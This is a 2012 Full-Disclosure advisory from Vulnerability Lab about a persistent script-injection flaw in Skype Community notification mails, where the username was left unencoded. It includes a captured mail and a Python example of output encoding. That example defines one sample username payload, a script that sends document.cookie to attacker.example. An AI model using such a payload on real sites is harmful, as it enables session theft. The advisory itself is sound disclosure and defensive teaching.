List: full-disclosure
Subject: [Full-disclosure] Skype Community - Mail Encoding Web Vulnerability #2
From: Vulnerability Lab <research@vulnerability-lab.com>
Date: 2012-11-26 18:04:35
Message-ID: 50B3AF33.4070508@vulnerability-lab.com
Title:
======
Skype Community - Mail Encoding Web Vulnerability #2
Date:
=====
2012-11-21
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=719
VL-ID:
=====
719
Common Vulnerability Scoring System:
====================================
4
Introduction:
=============
Skype is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011. The service allows users to communicate with peers by voice, video, and instant messaging over the Internet. Phone calls may be placed to recipients on the traditional telephone networks. Calls to other users within the Skype service are free of charge, while calls to landline telephones and mobile phones are charged via a debit-based user account system. Skype has also become popular for its additional features, including file transfer and videoconferencing. Competitors include SIP and H.323-based services, such as Linphone, as well as the Google Talk service, Mumble and Hall.com.

Skype has 663 million registered users as of September 2011. The network is operated by Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development team and 44% of the overall employees of the division are situated in Tallinn and Tartu, Estonia.

Unlike most other VoIP services, Skype is a hybrid peer-to-peer and client–server system. It makes use of background processing on computers running Skype software. Skype's original proposed name (Sky Peer-to-Peer) reflects this fact. Some network administrators have banned Skype on corporate, government, home, and education networks, citing reasons such as inappropriate usage of resources, excessive bandwidth usage, and security concerns.

(Copied from the vendor's Wikipedia entry: http://en.wikipedia.org/wiki/Skype)
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a filter and mail-encoding vulnerability in the official Skype Community web application: a username is inserted into the community's notification mails without being encoded.
Report-Timeline:
================
2012-10-08: Researcher Notification & Coordination
2012-10-10: Vendor Notification
2012-10-12: Vendor Response/Feedback
2012-11-18: Vendor Fix/Patch
2012-11-21: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
Microsoft
Product: Skype Community - Lithium Forums 2012 Q3
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A persistent input validation vulnerability was detected in the official Skype Community web application (Lithium forums). The vulnerability is located in the subscription update (notification) mail: the username is taken from the profile update form and inserted into the mail body without being sanitized or HTML-encoded. A remote attacker with a low-privileged application user account can change the username value to malicious persistent script code via a POST request; the community then sends the unparsed value out in the notification mail from noreply@skype.net, where any HTML-capable mail client renders it. Successful exploitation results in persistent phishing attacks, persistent session hijacking or manipulation of the mail context via the persistent injection.
Vulnerable Section(s):
[+] Skype Community - (Forums)
Vulnerable Module(s):
[+] Notification Mail
Vulnerable Parameter(s):
[+] Username
Affected Section(s):
[+] Update Mail - Filter / Output Listing
Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with a low-privileged application user account and low or medium required user interaction. For demonstration or to reproduce, see the captured notification mail below; the injected username lands unencoded in the "Hello <username>," greeting line of the HTML body.
<html>
<head>
<title>Skype Support Network Subscription: 1 Update: Betreff: Skype is Hacked ! Win32.Trojan.Agent.Gen schleicht sich durch die Accounts</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Subject: </b>Skype Support Network Subscription: 1 Update: Betreff: Skype is Hacked ! Win32.Trojan.Agent.Gen schleicht sich durch die Accounts</td></tr><tr><td><b>From: </b>Community Mailer <noreply@skype.net></td></tr><tr><td><b>Date: </b>06.10.2012 16:04</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr> <td><b>To: </b>rm01x <admin@vulnerability-lab.com></td></tr></table><br> <html>
<head>
<title>
Skype Support Network Subscription: 1 Update: Betreff: Skype is Hacked !
Win32.Trojan.Agent.Gen schleicht sich durch die Accounts </title>
<style type="text/css">
body, td { font: 10pt Arial, Helvetica; }
</style>
</head>
<body class="lia-body email-template">
<div class="lia-content subscription subscription-digest">
<div class="email-header">
<h2 class="email-greeting">
Hello <[[PERSISTENT INJECTED SCRIPT CODE AS USERNAME!]]>,
</h2>
<p class="email-totals">
You have 1 update for your Skype Support Network Subscriptions.
</p>
</div><!-- end email-header -->
<div class="email-main email-subscriptions">
<hr />
<div class="email-subscription">
<h3>Subscription to Topic: <a href="http://community.skype.com/t5/Skype-f%C3%BCr-Windows/Skype-is-Hacked-Win32-Trojan-Agent-Gen-schleicht-sich-durch-die/td-p/1086370">Skype is Hacked ! Win32.Trojan.Agent.Gen schleicht sich durch die Accounts</a> (1 Update)</h3>
<div class="email-subscription-notifications">
<div class="email-subscription-notification">
There was a new reply.<br>
<table class="notification-metadata" border=0 cellspacing=0 cellpadding=2>
<tr><td>Subject: </td><td> <a href="http://community.skype.com/t5/Skype-f%C3%BCr-Windows/Skype-is-Hacked-Win32-Trojan-Agent-Gen-schleicht-sich-durch-die/m-p/1101468#M6531">Betreff: Skype is Hacked ! Win32.Trojan.Agent.Gen schleicht sich durch die Accounts</a></td></tr>
<tr><td>Author:</td><td>Methu (New Member)</td></tr>
<tr><td>Date:</td><td>06-10-2012 16:04</td></tr>
</table>
<p class="email-notification-body-separate">
<a href="http://community.skype.com/t5/Skype-f%C3%BCr-Windows/Skype-is-Hacked-Win32-Trojan-Agent-Gen-schleicht-sich-durch-die/m-p/1101468#M6531">View</a>
</p>
</div><!-- end email-subscription-notification -->
</div><!-- end email-subscription-notifications -->
</div><!-- end email-subscription -->
</div><!-- end email-subscriptions -->
<hr />
<div class="email-footer">
<p class="manage-normal">
To manage your subscriptions or to change your subscription options,
click <a href="http://community.skype.com/skypec/user_subscriptions">here</a>.
</p>
<p class="manage-alternate">
If this link doesn't work:
<ol>
<li>Log on to Skype Support Network.</li>
<li>Click <b>My Profile</b>.</li>
<li>Click the <b>Subscriptions & Bookmarks</b> tab. </li>
<li>Change your settings and click <b>Save Changes</b>. </li>
</ol>
</p>
<p class="manage-thanks">Thanks for being a Skype Support Network member.</p>
<p class="manage-team">
<i>Your Skype Support Network Team</i>
</p>
<font size=-1>
<p class="manage-sent-to">
Skype Support Network sent this message to admin@vulnerability-lab.com.
</p>
<p class="manage-unsubscribe">
Did not request this email yourself? Click <a href="http://community.skype.com/t5/user/RemoveUserEmailPage/user-id/1915382/mail-message-tracking/H7YSNPPZVRU0CL">this link</a> to permanently prevent your email address being used on our community (NB: You won't be able to use the address yourself in the future).
</p>
</font>
</div><!-- end email-subscriptions-manage -->
</div><!-- end lithium-content -->
</body>
</html>
</body>
</html>
Solution:
=========
The vulnerability can be patched by parsing (HTML-encoding) the username, and every other user-controlled value, before it is inserted into the notification mail template, i.e. in the Lithium API request that builds the community mail from the form input. Encoding must happen at output time for the mail's HTML context; filtering the form input alone does not protect usernames that are already stored.
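As an added illustration of the Details and Solution sections above (example code written for this page, not code from the advisory, from Skype or from Lithium): the vulnerable rendering concatenates the raw username into the HTML greeting of the notification mail, the fixed rendering HTML-encodes it first, and a registration-time allowlist rejects markup in usernames as defence in depth. The greeting template, function names, attacker payload and sample addresses are assumptions for illustration, modelled on the "Hello <username>," line of the captured mail.

```python
"""Username -> HTML notification mail: vulnerable vs. encoded rendering.

Added example for this page; not the advisory's or Lithium's code.
Template, names and sample data are assumptions for illustration.
"""
import html
import re
from email.message import EmailMessage

# Constructed sample payload: script code submitted as the "Username"
# parameter of the profile form, as the advisory describes.
EVIL_USERNAME = (
    '<script>document.location="http://attacker.example/?c="'
    "+document.cookie</script>"
)

# Hypothetical greeting template, modelled on the captured mail's
# '<h2 class="email-greeting">Hello <username>,</h2>' line.
GREETING_TEMPLATE = '<h2 class="email-greeting">Hello {username},</h2>'


def render_greeting_vulnerable(username: str) -> str:
    """Vulnerable: the stored username goes into the HTML body unencoded."""
    return GREETING_TEMPLATE.format(username=username)


def render_greeting_fixed(username: str) -> str:
    """Fixed: encode for the HTML element context the value is placed in.

    html.escape turns < > & " ' into entities, so a script tag in the
    username is shown as text instead of being parsed as markup.
    """
    return GREETING_TEMPLATE.format(username=html.escape(username, quote=True))


# Defence in depth (assumed policy): letters, digits, . _ - and 3..32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{2,31}")


def username_is_acceptable(username: str) -> bool:
    """Allowlist check at registration/profile update; never the only control."""
    return USERNAME_RE.fullmatch(username) is not None


def build_notification_mail(username: str, recipient: str,
                            escape: bool = True) -> EmailMessage:
    """Build a multipart/alternative mail like the captured subscription mail.

    escape=False reproduces the vulnerable behaviour for comparison.
    """
    greeting = (render_greeting_fixed(username) if escape
                else render_greeting_vulnerable(username))
    html_body = (
        "<html><body>"
        f"{greeting}"
        "<p>You have 1 update for your Skype Support Network Subscriptions.</p>"
        "</body></html>"
    )
    msg = EmailMessage()
    msg["From"] = "Community Mailer <noreply@skype.net>"  # sender in captured mail
    msg["To"] = recipient
    msg["Subject"] = "Skype Support Network Subscription: 1 Update"
    msg.set_content("You have 1 update for your Skype Support Network Subscriptions.")
    msg.add_alternative(html_body, subtype="html")
    return msg


def html_part_contains_script(msg: EmailMessage) -> bool:
    """Detection helper for outbound mail: is there an unencoded <script tag?"""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            return "<script" in part.get_content().lower()
    return False


if __name__ == "__main__":
    for mode in (False, True):
        mail = build_notification_mail(EVIL_USERNAME, "rm01x <admin@example.com>", escape=mode)
        print(f"escape={mode}: script present = {html_part_contains_script(mail)}")
    print("payload accepted as username:", username_is_acceptable(EVIL_USERNAME))
```

html.escape is the right encoder only for HTML element content and quoted attribute values; a username placed into a URL, a JavaScript string or a mail header needs the encoder for that context. The allowlist check does not replace output encoding, because usernames stored before the fix still reach the template.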
Risk:
=====
The security risk of the filter & mail encoding vulnerability is estimated as medium(+)|(-)high.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/